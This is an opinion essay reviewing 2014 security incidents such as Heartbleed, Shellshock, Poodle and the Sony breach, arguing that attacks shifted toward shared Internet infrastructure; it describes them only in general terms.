Last year ended with a bang -- a devastating attack against Sony and a lot of finger pointing in the press. The fallout from the exploit will not only impact Sony’s IT posture, but as class action lawsuits pile up, Sony Entertainment will be dealing with the cleanup for a long time. These individual, high-visibility exploits create an awareness spike. But our attention doesn’t last. As soon as the press stops talking about it, people return to life as normal and take their computing for granted. As security professionals, we can’t afford to be distracted by the headlines. Attacks against systems are an ongoing drumbeat, and it is with this perspective that we looked back at 2014.
The shift to mainstream infrastructure exploits
There were plenty of high points in the news cycle - major retailers, email service providers, and healthcare institutions all had significant breaches. But in looking at the whole picture, it seems like there was a shift last year. There were several attacks against the foundation of the Internet that may be a harbinger of things to come. With that perspective, I consider 2014 to be the year that attacks shifted to mainstream infrastructure exploits.
In order to connect to the Internet or to use the Internet to deliver services, the world relies on a common set of building blocks. Not at the operating system level, but a few layers below. When those building blocks are compromised, everybody becomes vulnerable, even users that are doing the right thing by locking down all the right stuff.
The suggestion that shared infrastructure is the new target isn’t scientific. In doing the year in review, I looked to a lot of sources of exploit timelines and high volume attacks. But the one that made the lightbulb go off was the US-CERT current activity site. If you thumb back to page 50, you’ll start in January 2014.
Looking at the year holistically, it’s a shocker. Multiple exploits were disclosed and patches were announced for literally every OS, every browser, every rich media player, and every mobile platform. And don’t forget Java! I guess we’ve come to expect this: the ongoing drumbeat of vulnerabilities and patches. But the stuff below the surface is even scarier.
It got even worse
The first hints that something was changing came with the February announcement by RSA executive chairman Art Coviello that some underlying RSA libraries -- which are used to generate random numbers that are the basis of cryptography -- was based on mathematical routines that weren’t truly random. With this shot across the bow, it became clear that all of our data -- even that which we thought was secure -- was potentially exposed.
The problems with underlying cryptography components didn’t end there. In April, the Heartbleed vulnerability was exposed. Heartbleed allowed an outside party to exploit a vulnerability in the OpenSSL library to steal data directly from memory of a host. OpenSSL is a de facto standard implementation of the libraries used to encrypt Internet traffic. Again, everyone’s data was potentially exposed.
SSL got a brief respite, but in September, Shellshock hit the press. Bash is a text-based processor of computer commands that is used across most Internet-facing hosts. Shellshock is the name given to a vulnerability in Bash that would allow an external user to exploit a machine and have it perform arbitrary commands -- manipulate users and permissions, inject or egress data, access other systems, and more. Interestingly, the bug in the Bash code dated back to an early version shipped in 1989.
Before Shellshock died down, SSL was in the news again with Poodle. Poodle is another attack against SSL which allowed an attacker to steal cookies and other HTTP tokens from a vulnerable machine. With these tokens, a clever attacker could masquerade as the user and cause more damage.
Security is a process
These are just highlights, but they represent attacks that impact everyone and everything connected to the Internet. Attacks against infrastructure isn’t new, but these events of last year seem, to me anyway, to suggest a change in the tide. They were all mainstream revelations and had mainstream impact on our data.
As users, there is very little we can do about these vulnerabilities; they affect systems outside of our control. That means that we can do all the right things -- don’t click links in email, or type passwords into web forms, or render PDF files in the browser -- and still be at risk. When these building blocks are compromised, everyone is affected.
Security professionals have understood this since the early days. Security is not an end point, it is a process. Short of being aware of this (or disconnecting from the Internet), I guess we have to be prepared for more.